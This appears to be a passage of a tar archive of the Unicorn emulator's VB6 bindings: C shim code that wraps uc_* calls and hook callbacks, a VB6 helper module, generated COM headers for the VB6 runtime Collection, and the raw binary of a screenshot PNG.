= 3, hc_mem = 4, hc_memInvalid = 5}; //tracing UC_HOOK_CODE & UC_HOOK_BLOCK typedef void (__stdcall *vb_cb_hookcode_t) (uc_engine *uc, uint64_t address, uint32_t size, void *user_data); vb_cb_hookcode_t vbHookcode = 0; vb_cb_hookcode_t vbHookBlock = 0; //hooking memory UC_MEM_READ/WRITE/FETCH typedef void (__stdcall *vb_cb_hookmem_t) (uc_engine *uc, uc_mem_type type, uint64_t address, int size,int64_t value, void *user_data); vb_cb_hookmem_t vbHookMem = 0; //invalid memory access UC_MEM_*_UNMAPPED and UC_MEM_*PROT events typedef bool (__stdcall *vb_cb_eventmem_t) (uc_engine *uc, uc_mem_type type, uint64_t address, int size, int64_t value, void *user_data); vb_cb_eventmem_t vbInvalidMem = 0; //tracing interrupts for uc_hook_intr() typedef void (__stdcall *vb_cb_hookintr_t) (uc_engine *uc, uint32_t intno, void *user_data); vb_cb_hookintr_t vbHookInt = 0; /* typedef uint32_t (__stdcall *uc_cb_insn_in_t)(uc_engine *uc, uint32_t port, int size, void *user_data); tracing IN instruction of X86 typedef void (__stdcall *uc_cb_insn_out_t) (uc_engine *uc, uint32_t port, int size, uint32_t value, void *user_data); tracing OUT instruction of X86 */ //------------------ [ call back proxies ] ------------------------- static void c_hook_code(uc_engine *uc, uint64_t address, uint32_t size, void *user_data) { if(vbHookcode==0) return; vbHookcode(uc,address,size,user_data); } static void c_hook_mem(uc_engine *uc, uc_mem_type type,uint64_t address, int size, int64_t value, void *user_data) { if(vbHookMem==0) return; vbHookMem(uc,type,address,size,value,user_data); } static bool c_hook_mem_invalid(uc_engine *uc, uc_mem_type type, uint64_t address, int size, int64_t value, void *user_data) { if(vbInvalidMem==0) return false; return vbInvalidMem(uc,type,address,size,value,user_data); } static void c_hook_block(uc_engine *uc, uint64_t address, uint32_t size, void *user_data) { if(vbHookBlock==0) return; vbHookBlock(uc,address,size,user_data); } static void c_hook_intr(uc_engine *uc, uint32_t intno, void *user_data) { if(vbHookInt==0) return; vbHookInt(uc,intno,user_data); } /* static uint32_t hook_in(uc_engine *uc, uint32_t port, int size, void *user_data) { } static void hook_out(uc_engine *uc, uint32_t port, int size, uint32_t value, void *user_data) { } */ //------------------------------------------------------------- //uc_err uc_hook_add(uc_engine *uc, uc_hook *hh, int type, void *callback, void *user_data, uint64_t begin, uint64_t end, ...); //we need to use a C stub cdecl callback then proxy to the stdcall vb one.. //we could get cute with an asm thunk in vb but not worth complexity there are only a couple of them to support.. //cdecl callback to vb stdcall callback for tracing uc_err __stdcall ucs_hook_add(uc_engine *uc, uc_hook *hh, int type, void *callback, void *user_data, uint64_t begin, uint64_t end, int catagory, int instr_id){ #pragma EXPORT if(catagory == hc_code){ if(vbHookcode == 0){ if((int)callback==0) return UC_ERR_FETCH_UNMAPPED; vbHookcode = (vb_cb_hookcode_t)callback; } return uc_hook_add(uc,hh,type,c_hook_code,user_data,begin,end); } if(catagory == hc_block){ if(vbHookBlock == 0){ if((int)callback==0) return UC_ERR_FETCH_UNMAPPED; vbHookBlock = (vb_cb_hookcode_t)callback; } return uc_hook_add(uc,hh,type,c_hook_block,user_data,begin,end); } if(catagory == hc_mem){ //then it is some combination of memory access hook flags.. if(vbHookMem == 0){ if((int)callback==0) return UC_ERR_FETCH_UNMAPPED; vbHookMem = (vb_cb_hookmem_t)callback; } return uc_hook_add(uc,hh,type,c_hook_mem,user_data,begin,end); } if(catagory == hc_memInvalid){ //then it is some combination of invalid memory access hook flags.. if(vbInvalidMem == 0){ if((int)callback==0) return UC_ERR_FETCH_UNMAPPED; vbInvalidMem = (vb_cb_eventmem_t)callback; } return uc_hook_add(uc,hh,type,c_hook_mem_invalid,user_data,begin,end); } if(catagory == hc_int){ if(vbHookInt == 0){ if((int)callback==0) return UC_ERR_FETCH_UNMAPPED; vbHookInt = (vb_cb_hookintr_t)callback; } return uc_hook_add(uc,hh,UC_HOOK_INTR,c_hook_intr,user_data,begin,end); } return UC_ERR_ARG; } unsigned int __stdcall ucs_dynload(char *path){ #pragma EXPORT /*#ifdef DYNLOAD return uc_dyn_load(path, 0); #else*/ return 1; //#endif } unsigned int __stdcall ucs_version(unsigned int *major, unsigned int *minor){ #pragma EXPORT return uc_version(major, minor); } bool __stdcall ucs_arch_supported(uc_arch arch){ #pragma EXPORT return uc_arch_supported(arch); } uc_err __stdcall ucs_open(uc_arch arch, uc_mode mode, uc_engine **uc){ #pragma EXPORT return uc_open(arch, mode, uc); } uc_err __stdcall ucs_close(uc_engine *uc){ #pragma EXPORT return uc_close(uc); } uc_err __stdcall ucs_query(uc_engine *uc, uc_query_type type, size_t *result){ #pragma EXPORT return uc_query(uc, type, result); } uc_err __stdcall ucs_errno(uc_engine *uc){ #pragma EXPORT return uc_errno(uc); } const char *__stdcall ucs_strerror(uc_err code){ #pragma EXPORT return uc_strerror(code); } uc_err __stdcall ucs_reg_write(uc_engine *uc, int regid, const void *value){ #pragma EXPORT return uc_reg_write(uc, regid, value); } uc_err __stdcall ucs_reg_read(uc_engine *uc, int regid, void *value){ #pragma EXPORT return uc_reg_read(uc, regid, value); } uc_err __stdcall ucs_reg_write_batch(uc_engine *uc, int *regs, void *const *vals, int count){ #pragma EXPORT return uc_reg_write_batch(uc, regs, vals, count); } uc_err __stdcall ucs_reg_read_batch(uc_engine *uc, int *regs, void **vals, int count){ #pragma EXPORT return uc_reg_read_batch(uc, regs, vals, count); } uc_err __stdcall ucs_mem_write(uc_engine *uc, uint64_t address, const void *bytes, size_t size){ #pragma EXPORT return uc_mem_write(uc, address, bytes, size); } uc_err __stdcall ucs_mem_read(uc_engine *uc, uint64_t address, void *bytes, size_t size){ #pragma EXPORT return uc_mem_read(uc, address, bytes, size); } uc_err __stdcall ucs_emu_start(uc_engine *uc, uint64_t begin, uint64_t until, uint64_t timeout, size_t count){ #pragma EXPORT return uc_emu_start(uc, begin, until, timeout, count); } uc_err __stdcall ucs_emu_stop(uc_engine *uc){ #pragma EXPORT return uc_emu_stop(uc); } uc_err __stdcall ucs_hook_del(uc_engine *uc, uc_hook hh){ #pragma EXPORT return uc_hook_del(uc, hh); } uc_err __stdcall ucs_mem_map(uc_engine *uc, uint64_t address, size_t size, uint32_t perms){ #pragma EXPORT return uc_mem_map(uc, address, size, perms); } //requires link against v1.0 uc_err __stdcall ucs_mem_map_ptr(uc_engine *uc, uint64_t address, size_t size, uint32_t perms, void *ptr){ #pragma EXPORT return uc_mem_map_ptr(uc, address, size, perms, ptr); } uc_err __stdcall ucs_mem_unmap(uc_engine *uc, uint64_t address, size_t size){ #pragma EXPORT return uc_mem_unmap(uc, address, size); } uc_err __stdcall ucs_mem_protect(uc_engine *uc, uint64_t address, size_t size, uint32_t perms){ #pragma EXPORT return uc_mem_protect(uc, address, size, perms); } uc_err __stdcall ucs_mem_regions(uc_engine *uc, uc_mem_region **regions, uint32_t *count){ #pragma EXPORT return uc_mem_regions(uc, regions, count); } uc_err __stdcall ucs_context_alloc(uc_engine *uc, uc_context **context){ #pragma EXPORT return uc_context_alloc(uc, context); } uc_err __stdcall ucs_free(void *mem){ #pragma EXPORT return uc_free(mem); } uc_err __stdcall ucs_context_save(uc_engine *uc, uc_context *context){ #pragma EXPORT return uc_context_save(uc, context); } uc_err __stdcall ucs_context_restore(uc_engine *uc, uc_context *context){ #pragma EXPORT return uc_context_restore(uc, context); } /* char* asprintf(char* format, ...){ char *ret = 0; if(!format) return 0; va_list args; va_start(args,format); int size = _vscprintf(format, args); if(size > 0){ size++; //for null ret = (char*)malloc(size+2); if(ret) _vsnprintf(ret, size, format, args); } va_end(args); return ret; }*/ #ifdef INCLUDE_DISASM int __stdcall disasm_addr(uc_engine *uc, uint32_t va, char *str, int bufLen){ #pragma EXPORT uint32_t instr_len = 0; int readLen = 15; uint8_t data[32]; INSTRUCTION inst; if(bufLen < 100) return -1; //longest x86 instruction is 15 bytes, what if at the tail end of an allocation? try to read as much as we can.. while(uc_mem_read(uc,va,data,readLen) != 0){ readLen--; if(readLen == 0) return -2; } instr_len = get_instruction(&inst, data, MODE_32); if( instr_len == 0 ) return -3; get_instruction_string(&inst, FORMAT_INTEL, va, str, bufLen); /* if(inst.type == INSTRUCTION_TYPE_JMP || inst.type == INSTRUCTION_TYPE_JMPC){ if(inst.op1.type == OPERAND_TYPE_IMMEDIATE){ if(strlen(str) + 6 < bufLen){ if(getJmpTarget(str) < va){ strcat(str," ^^"); }else{ strcat(str," vv"); } } } }*/ return instr_len; } #endif //maps and write in one shot, auto handles alignment.. uc_err __stdcall mem_write_block(uc_engine *uc, uint64_t address, void* data, uint32_t size, uint32_t perm){ #pragma EXPORT uc_err x; uint64_t base = address; uint32_t sz = size; while(base % 0x1000 !=0){ base--; if(base==0) break; } sz += address-base; //if data starts mid block, we need to alloc more than just size.. while(sz % 0x1000 !=0){ sz++; } x = uc_mem_map(uc, base, sz, perm); if(x) return x; x = uc_mem_write(uc, address, (void*)data, size); if(x) return x; return UC_ERR_OK; } void addStr(_CollectionPtr p , char* str){ _variant_t vv; vv.SetString(str); p->Add( &vv.GetVARIANT() ); } uc_err __stdcall get_memMap(uc_engine *uc, _CollectionPtr *pColl){ #pragma EXPORT uc_mem_region *regions; uint32_t count; char tmp[200]; //max 46 chars used uc_err err = uc_mem_regions(uc, ®ions, &count); if (err != UC_ERR_OK) return err; for (uint32_t i = 0; i < count; i++) { sprintf(tmp,"&h%llx,&h%llx,&h%x", regions[i].begin, regions[i].end, regions[i].perms); addStr(*pColl,tmp); } //free(regions); //https://github.com/unicorn-engine/unicorn/pull/373#issuecomment-271187118 uc_free((void*)regions); return err; } enum op{ op_add = 0, op_sub = 1, op_div = 2, op_mul = 3, op_mod = 4, op_xor = 5, op_and = 6, op_or = 7, op_rsh = 8, op_lsh = 9, op_gt = 10, op_lt = 11, op_gteq = 12, op_lteq = 13 }; unsigned int __stdcall ULong(unsigned int v1, unsigned int v2, int operation){ #pragma EXPORT switch(operation){ case op_add: return v1 + v2; case op_sub: return v1 - v2; case op_div: return v1 / v2; case op_mul: return v1 * v2; case op_mod: return v1 % v2; case op_xor: return v1 ^ v2; case op_and: return v1 & v2; case op_or: return v1 | v2; case op_rsh: return v1 >> v2; case op_lsh: return v1 << v2; case op_gt: return (v1 > v2 ? 1 : 0); case op_lt: return (v1 < v2 ? 1 : 0); case op_gteq: return (v1 >= v2 ? 1 : 0); case op_lteq: return (v1 <= v2 ? 1 : 0); } return -1; }�������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������unicorn-2.1.1/bindings/vb6/misc.bas�����������������������������������������������������������������0000664�0000000�0000000�00000021117�14675241067�0017122�0����������������������������������������������������������������������������������������������������ustar�00root����������������������������root����������������������������0000000�0000000������������������������������������������������������������������������������������������������������������������������������������������������������������������������Attribute VB_Name = "misc" Option Explicit Public sharedMemory() As Byte 'in a module so it never goes out of scope and becomes unallocated.. Public Declare Function LoadLibrary Lib "kernel32" Alias "LoadLibraryA" (ByVal lpLibFileName As String) As Long Public Declare Function FreeLibrary Lib "kernel32" (ByVal hLibModule As Long) As Long Public Declare Sub CopyMemory Lib "kernel32" Alias "RtlMoveMemory" (Destination As Any, Source As Any, ByVal Length As Long) Public Declare Function GetProcAddress Lib "kernel32" (ByVal hModule As Long, ByVal lpProcName As String) As Long Public Declare Function GetModuleHandle Lib "kernel32" Alias "GetModuleHandleA" (ByVal lpModuleName As String) As Long Enum op op_add = 0 op_sub = 1 op_div = 2 op_mul = 3 op_mod = 4 op_xor = 5 op_and = 6 op_or = 7 op_rsh = 8 op_lsh = 9 op_gt = 10 op_lt = 11 op_gteq = 12 op_lteq = 13 End Enum 'unsigned math operations Public Declare Function ULong Lib "ucvbshim.dll" (ByVal v1 As Long, ByVal v2 As Long, ByVal operation As op) As Long 'this is just a quick way to support x64 numbers in vb6 its lite but can be bulky to work with 'if we wanted to really work with x64 values we would compile a library such as the following into the shim layer: ' https://github.com/dzzie/libs/tree/master/vb6_utypes Private Type Bit64Currency value As Currency End Type Private Type Bit64Integer LowValue As Long HighValue As Long End Type Global Const LANG_US = &H409 Function lng2Cur(v As Long) As Currency Dim c As Bit64Currency Dim dl As Bit64Integer dl.LowValue = v dl.HighValue = 0 LSet c = dl lng2Cur = c.value End Function Function cur2lng(v As Currency) As Long Dim c As Bit64Currency Dim dl As Bit64Integer c.value = v LSet dl = c cur2lng = dl.LowValue End Function Function KeyExistsInCollection(c As Collection, val As String) As Boolean On Error GoTo nope Dim t t = c(val) KeyExistsInCollection = True Exit Function nope: KeyExistsInCollection = False End Function Function FileExists(path As String) As Boolean On Error GoTo nope If Len(path) = 0 Then Exit Function If Right(path, 1) = "\" Then Exit Function If Dir(path, vbHidden Or vbNormal Or vbReadOnly Or vbSystem) <> "" Then FileExists = True Exit Function nope: FileExists = False End Function Function FileNameFromPath(fullpath) As String Dim tmp If InStr(fullpath, "\") > 0 Then tmp = Split(fullpath, "\") FileNameFromPath = CStr(tmp(UBound(tmp))) End If End Function Function GetParentFolder(path) As String Dim tmp, a As Long If Right(path, 1) = "\" Then GetParentFolder = path Else a = InStrRev(path, "\") If a > 0 Then GetParentFolder = Mid(path, 1, a) End If End If End Function Function FolderExists(ByVal path As String) As Boolean On Error GoTo nope If Len(path) = 0 Then Exit Function If Right(path, 1) <> "\" Then path = path & "\" If Dir(path, vbDirectory) <> "" Then FolderExists = True Exit Function nope: FolderExists = False End Function Function HexDump(bAryOrStrData, Optional hexOnly = 0, Optional ByVal startAt As Long = 1, Optional ByVal Length As Long = -1) As String Dim s() As String, chars As String, tmp As String On Error Resume Next Dim ary() As Byte Dim offset As Long Const LANG_US = &H409 Dim i As Long, tt, h, x offset = 0 If TypeName(bAryOrStrData) = "Byte()" Then ary() = bAryOrStrData Else ary = StrConv(CStr(bAryOrStrData), vbFromUnicode, LANG_US) End If If startAt < 1 Then startAt = 1 If Length < 1 Then Length = -1 While startAt Mod 16 <> 0 startAt = startAt - 1 Wend startAt = startAt + 1 chars = " " For i = startAt To UBound(ary) + 1 tt = Hex(ary(i - 1)) If Len(tt) = 1 Then tt = "0" & tt tmp = tmp & tt & " " x = ary(i - 1) 'chars = chars & IIf((x > 32 And x < 127) Or x > 191, Chr(x), ".") 'x > 191 causes \x0 problems on non us systems... asc(chr(x)) = 0 chars = chars & IIf((x > 32 And x < 127), Chr(x), ".") If i > 1 And i Mod 16 = 0 Then h = Hex(offset) While Len(h) < 6: h = "0" & h: Wend If hexOnly = 0 Then push s, h & " " & tmp & chars Else push s, tmp End If offset = offset + 16 tmp = Empty chars = " " End If If Length <> -1 Then Length = Length - 1 If Length = 0 Then Exit For End If Next 'if read length was not mod 16=0 then 'we have part of line to account for If tmp <> Empty Then If hexOnly = 0 Then h = Hex(offset) While Len(h) < 6: h = "0" & h: Wend h = h & " " & tmp While Len(h) <= 56: h = h & " ": Wend push s, h & chars Else push s, tmp End If End If HexDump = Join(s, vbCrLf) If hexOnly <> 0 Then HexDump = Replace(HexDump, " ", "") HexDump = Replace(HexDump, vbCrLf, "") End If End Function Public Function toBytes(ByVal hexstr, Optional strRet As Boolean = False) 'supports: '11 22 33 44 spaced hex chars '11223344 run together hex strings '11,22,33,44 csv hex '\x11,0x22 misc C source rips ' 'ignores common C source prefixes, operators, delimiters, and whitespace ' 'not supported '1,2,3,4 all hex chars are must have two chars even if delimited ' 'a version which supports more formats is here: ' https://github.com/dzzie/libs/blob/master/dzrt/globals.cls Dim ret As String, x As String, str As String Dim r() As Byte, b As Byte, b1 As Byte Dim foundDecimal As Boolean, tmp, i, a, a2 Dim pos As Long, marker As String On Error GoTo nope str = Replace(hexstr, vbCr, Empty) str = Replace(str, vbLf, Empty) str = Replace(str, vbTab, Empty) str = Replace(str, Chr(0), Empty) str = Replace(str, "{", Empty) str = Replace(str, "}", Empty) str = Replace(str, ";", Empty) str = Replace(str, "+", Empty) str = Replace(str, """""", Empty) str = Replace(str, "'", Empty) str = Replace(str, " ", Empty) str = Replace(str, "0x", Empty) str = Replace(str, "\x", Empty) str = Replace(str, ",", Empty) For i = 1 To Len(str) Step 2 x = Mid(str, i, 2) If Not isHexChar(x, b) Then Exit Function bpush r(), b Next If strRet Then toBytes = StrConv(r, vbUnicode, LANG_US) Else toBytes = r End If nope: End Function Private Sub bpush(bAry() As Byte, b As Byte) 'this modifies parent ary object On Error GoTo init Dim x As Long x = UBound(bAry) '<-throws Error If Not initalized ReDim Preserve bAry(UBound(bAry) + 1) bAry(UBound(bAry)) = b Exit Sub init: ReDim bAry(0) bAry(0) = b End Sub Sub push(ary, value) 'this modifies parent ary object On Error GoTo init Dim x x = UBound(ary) ReDim Preserve ary(x + 1) If IsObject(value) Then Set ary(x + 1) = value Else ary(x + 1) = value End If Exit Sub init: ReDim ary(0) If IsObject(value) Then Set ary(0) = value Else ary(0) = value End If End Sub Public Function isHexChar(hexValue As String, Optional b As Byte) As Boolean On Error Resume Next Dim v As Long If Len(hexValue) = 0 Then GoTo nope If Len(hexValue) > 2 Then GoTo nope 'expecting hex char code like FF or 90 v = CLng("&h" & hexValue) If Err.Number <> 0 Then GoTo nope 'invalid hex code b = CByte(v) If Err.Number <> 0 Then GoTo nope 'shouldnt happen.. > 255 cant be with len() <=2 ? isHexChar = True Exit Function nope: Err.Clear isHexChar = False End Function Function hhex(b As Byte) As String hhex = Hex(b) If Len(hhex) = 1 Then hhex = "0" & hhex End Function Function rpad(x, i, Optional c = " ") rpad = Left(x & String(i, c), i) End Function Function lbCopy(lstBox As Object) As String Dim i As Long Dim tmp() As String For i = 0 To lstBox.ListCount push tmp, lstBox.List(i) Next lbCopy = Join(tmp, vbCrLf) End Function �������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������unicorn-2.1.1/bindings/vb6/msvbvm60.tlh�������������������������������������������������������������0000664�0000000�0000000�00000004145�14675241067�0017673�0����������������������������������������������������������������������������������������������������ustar�00root����������������������������root����������������������������0000000�0000000������������������������������������������������������������������������������������������������������������������������������������������������������������������������// Created by Microsoft (R) C/C++ Compiler Version 15.00.21022.08 (2358e5d7). // // d:\projects\col\col\debug\msvbvm60.tlh // // C++ source equivalent of Win32 type library C:\\windows\system32\msvbvm60.dll // compiler-generated file created 03/21/16 at 11:45:20 - DO NOT EDIT! #pragma once #pragma pack(push, 8) #include <comdef.h> // // Forward references and typedefs // struct __declspec(uuid("000204ef-0000-0000-c000-000000000046")) /* LIBID */ __VBA; struct __declspec(uuid("a4c46780-499f-101b-bb78-00aa00383cbb")) /* dual interface */ _Collection; struct /* coclass */ Collection; // // Smart pointer typedef declarations // _COM_SMARTPTR_TYPEDEF(_Collection, __uuidof(_Collection)); // // Type library items // struct __declspec(uuid("a4c46780-499f-101b-bb78-00aa00383cbb")) _Collection : IDispatch { // // Wrapper methods for error-handling // _variant_t Item ( VARIANT * Index ); HRESULT Add ( VARIANT * Item, VARIANT * Key = &vtMissing, VARIANT * Before = &vtMissing, VARIANT * After = &vtMissing ); long Count ( ); HRESULT Remove ( VARIANT * Index ); IUnknownPtr _NewEnum ( ); // // Raw methods provided by interface // virtual HRESULT __stdcall raw_Item ( /*[in]*/ VARIANT * Index, /*[out,retval]*/ VARIANT * pvarRet ) = 0; virtual HRESULT __stdcall raw_Add ( /*[in]*/ VARIANT * Item, /*[in]*/ VARIANT * Key = &vtMissing, /*[in]*/ VARIANT * Before = &vtMissing, /*[in]*/ VARIANT * After = &vtMissing ) = 0; virtual HRESULT __stdcall raw_Count ( /*[out,retval]*/ long * pi4 ) = 0; virtual HRESULT __stdcall raw_Remove ( /*[in]*/ VARIANT * Index ) = 0; virtual HRESULT __stdcall raw__NewEnum ( /*[out,retval]*/ IUnknown * * ppunk ) = 0; }; struct __declspec(uuid("a4c4671c-499f-101b-bb78-00aa00383cbb")) Collection; // [ default ] interface _Collection // // Wrapper method implementations // #include "msvbvm60.tli" #pragma pack(pop) ���������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������unicorn-2.1.1/bindings/vb6/msvbvm60.tli�������������������������������������������������������������0000664�0000000�0000000�00000002745�14675241067�0017700�0����������������������������������������������������������������������������������������������������ustar�00root����������������������������root����������������������������0000000�0000000������������������������������������������������������������������������������������������������������������������������������������������������������������������������// Created by Microsoft (R) C/C++ Compiler Version 15.00.21022.08 (2358e5d7). // // d:\projects\col\col\debug\msvbvm60.tli // // Wrapper implementations for Win32 type library C:\\windows\system32\msvbvm60.dll // compiler-generated file created 03/21/16 at 11:45:20 - DO NOT EDIT! #pragma once // // interface _Collection wrapper method implementations // inline _variant_t _Collection::Item ( VARIANT * Index ) { VARIANT _result; VariantInit(&_result); HRESULT _hr = raw_Item(Index, &_result); if (FAILED(_hr)) _com_issue_errorex(_hr, this, __uuidof(this)); return _variant_t(_result, false); } inline HRESULT _Collection::Add ( VARIANT * Item, VARIANT * Key, VARIANT * Before, VARIANT * After ) { HRESULT _hr = raw_Add(Item, Key, Before, After); if (FAILED(_hr)) _com_issue_errorex(_hr, this, __uuidof(this)); return _hr; } inline long _Collection::Count ( ) { long _result = 0; HRESULT _hr = raw_Count(&_result); if (FAILED(_hr)) _com_issue_errorex(_hr, this, __uuidof(this)); return _result; } inline HRESULT _Collection::Remove ( VARIANT * Index ) { HRESULT _hr = raw_Remove(Index); if (FAILED(_hr)) _com_issue_errorex(_hr, this, __uuidof(this)); return _hr; } inline IUnknownPtr _Collection::_NewEnum ( ) { IUnknown * _result = 0; HRESULT _hr = raw__NewEnum(&_result); if (FAILED(_hr)) _com_issue_errorex(_hr, this, __uuidof(this)); return IUnknownPtr(_result, false); } ���������������������������unicorn-2.1.1/bindings/vb6/screenshot.png�����������������������������������������������������������0000664�0000000�0000000�00000054652�14675241067�0020375�0����������������������������������������������������������������������������������������������������ustar�00root����������������������������root����������������������������0000000�0000000������������������������������������������������������������������������������������������������������������������������������������������������������������������������PNG  ��� IHDR�������-��� pHYs�� �� ����gAMA��|Q��� cHRM��z%��������u0��`��:��o_F��Y IDATx � �00m���]`�anSPy.#'7q���+$�С��0{!%DV.d���Xء���Ah���G ^014Oz.{S8PE N6] >&Jk낰^AhI&:)No_cuAo8ooJA~$; OnN3Svh<{Sڢe7 Cziy,`~bI/zL:4 ~YY 8Eb }fFszE1=;LX,^31`sZkתU_V_5{���� W^���@�(`Q0 F(`LiO^GGGS?kU3�`��@�xVgC`��<90u`۝ip6Jhj`Q0 F(`Qt ,r]@ml&T 1x `ZP`4Q0 F(`Q0 F<wq�D\хv|a�L˭dOpuh*`Q0 F(`:|QbfavvA� vt<~t5L_nMACf~?ߜ 4r>ݘ 'acx!.`kvzG(`Q0 F(`wa^b:�@�@ h%JIb[?XOG0H[8<C3v9mf:7yn۸G. b}B,$I$)z.6ػc��`-BGq5BZyyyZ|4w ��Ofy`m��`&hR[U1!���{_@T,FkɫX`Q0 F(`!DNU"�w'�0ٜu؂,"$ wI}LoS[E&ݥh՛8X5z5$I$} U@[ S�"_7"مQb|yp �; @W! R8F(`Q0 F(& �IKE�.g`Q0 F(`l1m2���0�? B{>}���GvOWG5�� >hE jN">Ude1��O=9ݱw2����HZ"���@�aZ7*`Q0 F(# 'Q|Q0 ����� W^���@�@���`=Hx��XJ�د���A"��`)د���A"��`)د���A"��`)د���A"��`)د���A"��`)د���A"��`)ءC*�@�zI$>T!PwϬ[��$eyءC�`t (쎿,Lƒx��uvSg6�0 �ĸ_P]FhUpH$Iz̮Ƽ_X�@PEGN, Nu}~$I$ՍKnΈx)�{vh��@l6�|x3���ߘ» � ﺇN_x4ԗ��h@wxj`4jCo54&F?.uU(`Q0 F(o!;K�#zG.@Bb0 t[l)jtjF(`Q0 F(~#@� Q0 150 F(`Q0 Fp:4 :Ëm%!$F<ȑrt(.4I;!hvG(`Q0 F(߈KN/@�Qu[%X#,l.qE�!7[^lcDOB %k-Q0 F(`Q0 FFl]\|J@�}/%::19ȘsfW|~'尤N(`Q0 F( qunq/YQ@D̼a˙G(`Q0 F( =~ 'hn/@�|`\{.qu2uPItuHdwr "5.k`Q0 F(m{j�윱 � DNxoi-m쮫4ckfyqxT6;TJ*i?M9?qjFwB݉#Nn~����P}+�xI30!aBE2=tISwr“V s.bJ-sHk.l(`Q0 F(�Ԟft�};4��A�8;{.( />��pÛ;gD�� ĬU)1s'/���XwG�ػC� @X s4)' o9K$Id4O_R�B^3lwGQzGQzGQz oNre�سc��aYBYD/���$uC$��� CN7���@���וA 1~ ��9عc��o6rŃhLu3�;D� __.Xh-[lV!Bfls5:e/��'�;wh����V9p ڞ��9;c�@N Nws['͵n*˪s;o|Nsv|v-�����K�1� ʆ%j@xw()RxB"9ҙ_Nouә:\=׻H$IҤ%�;w�A6_`MrEoV!4txw5׮=$#�W�1 ���01ABb\GИ ��x4Tm֡*n'IcX=`Q0 F(` >�@T%&Y ]?YKdu3=Ð7Ln83|u35xQ0 F(`Q0@�dI3}HP/LS3Nn(`Q0 F(`� ��� xq4S���`d����[+��`d����[+��`d����[+��`d����[+��`d����[+��`m���5MioAq ���V"�ݡ��3[m$ HG\cWN>��Z�D/Y9|ց�KXYNb %3F;`Q0 F(``�ڱ ��.1BV')s��5�@םX2H0sl4Gz1wDyWugDzԮ7l9명֣;6'/����_h@L[g]=46=ClWwө!d.(@s/6 oj-!&6_ lb_`Q0 F(` �hZQNH !4#K?1rvH`f\RovKIݣKF<PCilQ0 F(`�hPL(91TlC+@l8˜f`L`Q0 F( h~/K A!J:p7P9jzz,lr8Q0 F(`�w8� ]A-!0L[% gEr,(}b&F>Q\tESGfŤ.�j0 fj-}&Mn~fR&j)v#.Lϸ`Q0 F(`� ��� xq4S���`d����[+��`d����[+��`d����[+��`d����[+��`d����[+��`i��`w͏b~(}TW�`Kh PՓzo*1vRu𤝁 \vS>*a/ZvQ0 F(` '�@TbkRi ;PxakX |r԰5 6)tb70$6J+vI)F(`Q0 F�U4`蝡q`(ܓR"cBjFƏQ0 F(`P�` R��A _wP-4s-(%4JUs_T[Mj٣n)U~t_pV1^adUϥN몓 O+kjVuS{6c����`̑��A_[9Zh V�oONYGH#\%mt*_d l#"t(N˹?\O8^_ownј�����&�;g� [a殄H:oV7f>dn +TbOKX8RzΪմIXW{ǭa���%�;wl���i_p4K=Fo7T�@LCf/@PC쉦GSlJJQۭ7Ä|AaQ0 F(`P�3"ǵOmĨA\7SҐF^LCz $Ը'#b^~#&N?pC Sb!=Ć6=(hY[`Q0 F(#�M4ks@ 9AQyj)LhRc_.(u+F 7Q+he3y*mߣ`Q0 F(#�`H���^���%�1 ���0 QjZAJ ��&�1 ��� pB\��5ص���A#��`d����[+��`d����[+��` ���oM<l-.xО�CFPL 1g(UxΣ`Q0 F(`�/=A` E5 o\9:4 F`(`Q0 @�v��A ]si"��� /,XcYвSdy|Vg( ĺg42Q0 >RRW3M tie(`Q@���@[ ΄vBdLwz6{7c.j\j�Nkc<��_7:‰7`KD�� s;1SA3Lk?�X|ޏ(cLl'|. .ze\`Q0 H�ع��o"wL^NRM-. @@T?N=;@wl(`tP*%. 5WQ0 F(# �]µ:lfP A̒eZ-iƷRHu !?c Gbjh <3 F|=a; Y[H-]q6ZvQ0 F(�^jTXl8k5Fk;Q7+ݏ6LG(O =.r< F(`� �{w ���0_��`)د���A"��`)د���A"��`)د���A"��`)د���A"��`)د���A"��`)د���A"��`)2\<= Gxs`r0@.jCG.BQ@|1 F(`Q0@� /QܰFf#7pF+u"F`\pP#X_ u0 j/F;ģ`Q0 F(*� fBH~5> ` <SCJ{y; F(`��^PCXq5O<Q|3GC8!SaVgԜ5]J&F:fGz b< F(`Q0� �"Թ$f#|j6gZ Q0r@uIA֑fhgQ0 F(` f�@4K(:Τv)@cA;gI5wԜgA jCˎ9.{ RE 7ۗ<;=Q0 F(`��h"CL\bdFl'cԜe=4)F3`Q0 F( � )͔6I{FO.Ĥ%rgCYā€M|$ e,(`Q0 #� wx-v@`kGko.݃M=1Qj#>?`[^:jC̀ 5!75_ĘC &/WEz&\`Q0 F( � hrhԑz1l)'d=aELs_eyv$u$.F(`Q0 �`H���^���%�ׁ ��� {|e���ׁ ��� {|e���ׁ ��� {|e���ׁ ��� {|e���ׁ ��� {|e���ׁ ��� {|e���!�0\\WфJQPJro+laPG��69h:C.B�l)ױA#;6 aKb‡N` RhwQ0 F(` V�=;V�(YPp/edq8ή[rhf|v*�M�v%�u + fBVVk##K}Od,;3ЙVSͨNlj˛A����2`όq��A _0iG!8k^v1]No^U9L{E5"$=bP# 4@TQR:VN4)nfGq>x0Sjj `Q0 F(`�ɒfjoO`v39ԘĜᾤy4|F(`Q0 F(<� ~/%4;Co @۲gzuمo6g2 a8 F(`Q0 F!�@t9 ^N\ٷ 'th5u5>wc; M(70& Y@V &|I-|IW`Q0 F(` �&{xRyZ4)q%w(-L0&?饇!(`Q0 F(� �;t@��0?z���(د���A"��`)د���A"��`)د���A"��`)د���A"��`)د���A"��`)4,:vd0Σ`Q0 F(`J@���[WA \ ޜmi[�� ��0�kAұtC_v]}n k��+`d����[+^���@�v�kCQ+n 6ŜXZv{h}QLrycՈwx6{\*iG�����f ~��0v$%H]n=^'VYk9St󓞩Yn2>kzJUΫ \]Iw �����`N��a ߵ z ` m ޝH4’ dNuYpv� سc��`K : < 6F:k�� ZEXj7�E "2~aK)U3 F(`Q0 F(|� �{�UJ7)5D RQŻyVlsMPҍUMINDMvi�����s`m��A �Z **5wNf\I/�[O�@���`= ��RwD��0Ė\ ](x0aOo���Ҭ� ���{FPp��:"�ځ ��� {|ő ��R_2����E ��R_2����E ��Rw���&Z\]X��t@fZ\Ę3* Q0 F(`Q0 F(l� 